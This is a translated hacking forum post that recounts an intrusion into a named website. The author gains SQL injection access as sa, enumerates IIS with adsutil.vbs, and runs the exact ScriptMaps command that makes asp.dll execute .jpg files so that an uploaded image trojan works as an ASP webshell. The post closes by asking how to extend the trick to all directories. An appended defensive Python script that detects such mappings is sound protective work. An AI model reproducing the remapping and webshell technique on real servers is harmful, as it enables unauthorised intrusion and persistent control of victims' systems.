An Unconventional Use of adsutil.vbs in an Intrusion
maomao

One intrusion I carried out:
www.wanbin.com/mm.asp?id=1 was the injection point, logged in as sa, and the IP was 1.1.1.1.
http://1.1.1.1/ returned the home page directly. Initial footprinting suggested the home page was the default one.
The intrusion went as follows:
Run in NBSI:
adsutil.vbs ENUM w3svc/1/root to get the information on the default web site:
C:\Inetpub\AdminScripts>adsutil.vbs ENUM w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:\WINNT\help\iisHelp\common\400.htm"
"401,1,FILE,C:\WINNT\help\iisHelp\common\401-1.htm"
"401,2,FILE,C:\WINNT\help\iisHelp\common\401-2.htm"
"401,3,FILE,C:\WINNT\help\iisHelp\common\401-3.htm"
"401,4,FILE,C:\WINNT\help\iisHelp\common\401-4.htm"
"401,5,FILE,C:\WINNT\help\iisHelp\common\401-5.htm"
"403,1,FILE,C:\WINNT\help\iisHelp\common\403-1.htm"
"403,2,FILE,C:\WINNT\help\iisHelp\common\403-2.htm"
"403,3,FILE,C:\WINNT\help\iisHelp\common\403-3.htm"
"403,4,FILE,C:\WINNT\help\iisHelp\common\403-4.htm"
"403,5,FILE,C:\WINNT\help\iisHelp\common\403-5.htm"
"403,6,FILE,C:\WINNT\help\iisHelp\common\403-6.htm"
"403,7,FILE,C:\WINNT\help\iisHelp\common\403-7.htm"
"403,8,FILE,C:\WINNT\help\iisHelp\common\403-8.htm"
"403,9,FILE,C:\WINNT\help\iisHelp\common\403-9.htm"
"403,10,FILE,C:\WINNT\help\iisHelp\common\403-10.htm"
"403,11,FILE,C:\WINNT\help\iisHelp\common\403-11.htm"
"403,12,FILE,C:\WINNT\help\iisHelp\common\403-12.htm"
"403,13,FILE,C:\WINNT\help\iisHelp\common\403-13.htm"
"403,15,FILE,C:\WINNT\help\iisHelp\common\403-15.htm"
"403,16,FILE,C:\WINNT\help\iisHelp\common\403-16.htm"
"403,17,FILE,C:\WINNT\help\iisHelp\common\403-17.htm"
"404,*,FILE,C:\WINNT\help\iisHelp\common\404b.htm"
"405,*,FILE,C:\WINNT\help\iisHelp\common\405.htm"
"406,*,FILE,C:\WINNT\help\iisHelp\common\406.htm"
"407,*,FILE,C:\WINNT\help\iisHelp\common\407.htm"
"412,*,FILE,C:\WINNT\help\iisHelp\common\412.htm"
"414,*,FILE,C:\WINNT\help\iisHelp\common\414.htm"
"500,12,FILE,C:\WINNT\help\iisHelp\common\500-12.htm"
"500,13,FILE,C:\WINNT\help\iisHelp\common\500-13.htm"
"500,15,FILE,C:\WINNT\help\iisHelp\common\500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"
DefaultDoc : (STRING) "index.aspx,index.htm,Default.htm,Default.asp,iisstart.asp,Default.aspx"
Path : (STRING) "E:\dvbbs"
AccessFlags : (INTEGER) 513
ScriptMaps : (LIST) (2 Items)
".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
[/w3svc/1/root/Scripts]
[/w3svc/1/root/IISHelp]
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/IISAdmin]
[/w3svc/1/root/IISSamples]
[/w3svc/1/root/MSADC]
[/w3svc/1/root/Printers]
[/w3svc/1/root/aspnet_client]
[/w3svc/1/root/bin]
[/w3svc/1/root/Manage]
From this we found that the path of the home page is e:\dvbbs.
Then test:
echo linzi is here >e:\dvbbs\1.txt
Opening http://1.1.1.1/1.txt displayed it successfully, which showed we were right.
Then I used echo to write a small webshell and found that % was filtered; since the site is dvbbs, we can upload images instead.
Then enter in NBSI:
adsutil.vbs SET W3SVC/1/root/ScriptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
Then upload a newmm.jpg. After the upload succeeded, newmm.jpg did indeed behave the same as newmm.asp,
which shows that from the command line you can make asp.dll parse jpg.
Summary of the approach:
When we hit an intrusion with no command echo, we can have asp.dll parse jpg, so that our image trojan has the same functionality as an asp trojan.
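As an added defender-side example, not part of the original post: a script that parses output of the form shown by `adsutil.vbs ENUM w3svc/1/root` above and flags any static-content extension (such as .jpg) that has been mapped to a script engine, which is exactly the ScriptMaps change this post makes. The sample output, the extension list and the engine list are constructed assumptions.

```python
import re

# Script engines that execute server-side code; any extension mapped to one
# of these is executed by IIS, whatever the extension looks like (assumed list).
SCRIPT_ENGINES = ("asp.dll", "aspnet_isapi.dll")

# Extensions that should never be wired to a script engine on a normal site (assumed list).
STATIC_EXTENSIONS = {".jpg", ".jpeg", ".gif", ".png", ".bmp", ".txt", ".htm", ".html"}

# Constructed sample of `adsutil.vbs ENUM w3svc/1/root` output after the
# .jpg mapping described in the post was added (not real captured output).
SAMPLE_ENUM_OUTPUT = '''
Path : (STRING) "E:\\dvbbs"
ScriptMaps : (LIST) (3 Items)
  ".jpg,c:\\winnt\\system32\\inetsrv\\asp.dll,5,GET,HEAD,POST,TRACE"
  ".asp,c:\\winnt\\system32\\inetsrv\\asp.dll,5,GET,HEAD,POST,TRACE"
  ".aspx,c:\\winnt\\Microsoft.NET\\Framework\\v1.1.4322\\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
AccessFlags : (INTEGER) 513
'''

def parse_script_maps(enum_output):
    """Return (extension, handler_path) pairs from the ScriptMaps LIST block."""
    maps = []
    in_list = False
    for line in enum_output.splitlines():
        stripped = line.strip()
        if stripped.startswith("ScriptMaps"):
            in_list = True
            continue
        if in_list:
            m = re.match(r'"([^,]+),([^,]+),', stripped)
            if not m:
                break  # first non-quoted line ends the LIST block
            maps.append((m.group(1).lower(), m.group(2).lower()))
    return maps

def suspicious_mappings(enum_output):
    """Flag static-content extensions that are handed to a script engine."""
    flagged = []
    for ext, handler in parse_script_maps(enum_output):
        engine = handler.rsplit("\\", 1)[-1]  # file name of the handler DLL
        if ext in STATIC_EXTENSIONS and engine in SCRIPT_ENGINES:
            flagged.append((ext, engine))
    return flagged

if __name__ == "__main__":
    for ext, engine in suspicious_mappings(SAMPLE_ENUM_OUTPUT):
        print(f"ALERT: {ext} is executed by {engine}")
```

Run against the real ENUM output of each site and application to check whether the mapping list has been altered.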
Of course there are better methods when you have sa, but what we are after here is the idea, as a technical discussion, so we will leave the other methods aside for now.
Question:
But during an intrusion the default site may not be started. Of course we can use
adsutil.vbs START_SERVER W3SVC/1 to start it.
But can we make every directory parse jpg with asp.dll? I tried using a wildcard under DOS, but after a long time I still had no success, so I am raising it here for discussion.